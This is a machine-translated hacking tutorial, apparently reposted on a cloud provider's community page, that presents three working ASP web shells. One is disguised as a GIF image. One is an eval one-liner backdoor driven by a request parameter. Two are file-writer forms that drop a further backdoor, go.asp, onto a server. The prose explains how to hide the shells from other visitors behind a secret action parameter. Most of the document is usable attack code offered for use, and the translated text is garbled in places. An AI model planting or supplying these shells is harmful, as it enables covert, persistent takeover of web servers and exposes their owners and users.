Several double function kill Super Version ASP Pony _ Safety Course

Source: Internet
Author: User
Tags chr eval
First paragraph:
Copy Code code as follows:

gif89a$;<%eval Request (Chr (1))%>
<%
On Error Resume Next
Testfile=request.form ("filepath")
Msg=request.form ("message")
If Trim (Request ("filepath")) <> "Then
Set Fs=server. CreateObject ("Scripting.FileSystemObject")
Set THISFILE=FS. CreateTextFile (Testfile,true)
Thisfile. Write ("&msg&")
If Err =0 Then
Response.Write "<font color=red>ok</font>"
Else
Response.Write "<font color=red>no</font>"
End If
Err.Clear
Thisfile.close
Set fs = Nothing
End If
%>
<form method= "POST" action= "" >
<input type= "text" size= "name=" "filepath"
Value= "<%=server.mappath (" go.asp ")%>" > <BR>
<textarea name= "Message" rows= "5" cols= "></TEXTAREA>"
<input type= "Submit" Name= "Send" value= "Go" >
</form></body>

Second paragraph:
Copy Code code as follows:

gif89a$;<%eval Request (Chr (1))%>
<% If Request ("action") = "kof97" then%>
<%on Error Resume Next%>
<%ofso= "Scripting.FileSystemObject"%>
<%set Fso=server.createobject (OFSO)%>
<%path=request ("path")%>
<%if path<> "" then%>
<%data=request ("dama")%>
<%set dama=fso.createtextfile (path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%= "Success"%>
<%else%>
<%= "false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%= "<form action= ' method=post>"%>
<%= "<input type=text name=path>"%>
<%= "<br>"%>
<%=server.mappath (Request.ServerVariables ("Script_name"))%>
<%= "<br>"%>
<%= ""%>
<%= "<textarea Name=dama cols=50 rows=10 width=30></textarea>"%>
<%= "<br>"%>
<%= "<input type=submit value=save>"%>
<%= "</form>"%>
<% End If%>
</body>

Third paragraph:
Copy Code code as follows:

<%set s=server.createobject ("ADODB.stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.charset= "gb2312"%>
<%s.writetext Request ("D")%>
<%s.savetofile Server.MapPath ("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea Name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

Instructions and introduction to use:
The first function of the description: A word to connect the horse or direct transmission horse

gif89a$;--[here the meaning of the idea is that everyone knows that the meaning of uploading images plays a role in deception.]

<%eval Request (Chr (1))%>
--[This is on the ASP a word trojan here Chr (1) is the ASP a word trojan password
So the actual Chr (1) = So the password is not to say you don't know.
The point is, when you use this ASP pony, you can use this ASP pony to the inside of a sentence to preach the big horse can also be directly with this Chuan Ma

The go.asp here is to upload the address of the horse, this can be modified to say enough detail it
Second paragraph:
Ditto function will not say!

<% If Request ("action") = "kof97" then%>
I believe that understand the ASP's a look will understand! I don't have much to say.
Is the usage directly behind your pony address? Action=kof97 give me an example.
Http://www.xxx.com/xxx.asp?action=kof97 kof97 this into his own! change in the pony.
The advantage is that when someone accesses your pony directly, it shows a blank space and you can't use your pony like a pony with a password.
Third paragraph:
It can be said that in addition to the ASP a word of the pony is not it mo belong! Only more than 200 bytes

<%s.savetofile Server.MapPath ("go.asp"),2%>
When you open the Pony address, it will automatically generate go.asp modified into its own
This pony is to be used in conjunction with a word pony or other pony when you write to our horse in the input box then the DOT submit will automatically generate the Go.asp pony address
The advantage is that when someone visits your pony directly, no matter what horse he submits, he doesn't know the address of the file you set up.
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.